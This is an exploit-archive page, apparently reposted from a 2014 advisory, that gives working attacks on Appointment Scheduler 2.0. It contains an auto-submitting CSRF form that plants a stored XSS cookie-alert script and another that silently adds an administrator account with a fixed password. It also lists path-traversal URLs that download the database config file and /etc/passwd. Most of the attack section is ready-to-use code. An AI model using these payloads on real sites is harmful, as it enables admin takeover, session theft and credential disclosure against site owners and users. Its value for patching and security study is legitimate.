Appointment Scheduler 2.0 XSS / CSRF / File Disclosure

Appointment Scheduler 2.0 XSS / CSRF / File Disclosure: Posted Jan 13, 2014; Authored by HackXBack; Appointment Scheduler version 2.0 suffers from file disclosure, cross site request forgery, and cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss, file inclusion, info disclosure, csrf; SHA-256 | c862a29944969863f0975fcc7d158a1e88bc1056d42e23427041ef26085170b4; Download | Favorite | View

Appointment Scheduler 2.0 XSS / CSRF / File Disclosure

Appointment Scheduler V2.0 - Multiple Vulnerabilties
=========================================================================

####################################################################
.:. Author         : HackXBack
.:. Contact        : h-b@usa.com
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://www.phpjabbers.com/appointment-scheduler/
.:. Tested On Demo :
http://www.phpjabbers.com/demo/1389471646_885/index.php?controller=pjAdmin&action=pjActionLogin
####################################################################

===[ Exploit ]===

[1] Cross Site Scripting
=========================

# CSRF with XSS Exploit:


<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=pjAdminServices&action=pjActionCreate">
<input type="hidden" name="service_create" value="1"/>
<input type="hidden" name="i18n[1][name]"
value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="i18n[1][description]" value="Iphobos Blog"/>
<input type="hidden" name="price" value="100"/>
<input type="hidden" name="length" value="1"/>
<input type="hidden" name="before" value="1"/>
<input type="hidden" name="after" value="1"/>
<input type="hidden" name="total" value="3"/>
<input type="hidden" name="is_active" value="1"/>
</form>
</body>
</html>


[2] Cross Site Request Forgery
===============================

[Add Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=pjAdminUsers&action=pjActionCreate">
<input type="hidden" name="user_create" value="1"/>
<input type="hidden" name="role_id" value="1"/>
<input type="hidden" name="email" value="Email@hotmail.com"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="name" value="Iphobos"/>
<input type="hidden" name="status" value="T"/>
</form>
</body>
</html

[3] Local File disclure
========================

http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../app/config/db.inc.php
http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd


####################################################################

Top Authors In Last 30 Days

Red Hat 184 files
Ubuntu 64 files
Debian 22 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Google Security Research 6 files
Apple 6 files
malvuln 4 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,009)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,174)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,460)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,433)
UNIX (9,390)
UnixWare (187)
Windows (6,648)
Other

Appointment Scheduler 2.0 XSS / CSRF / File Disclosure

Appointment Scheduler 2.0 XSS / CSRF / File Disclosure

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Appointment Scheduler 2.0 XSS / CSRF / File Disclosure

Share This

Appointment Scheduler 2.0 XSS / CSRF / File Disclosure

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems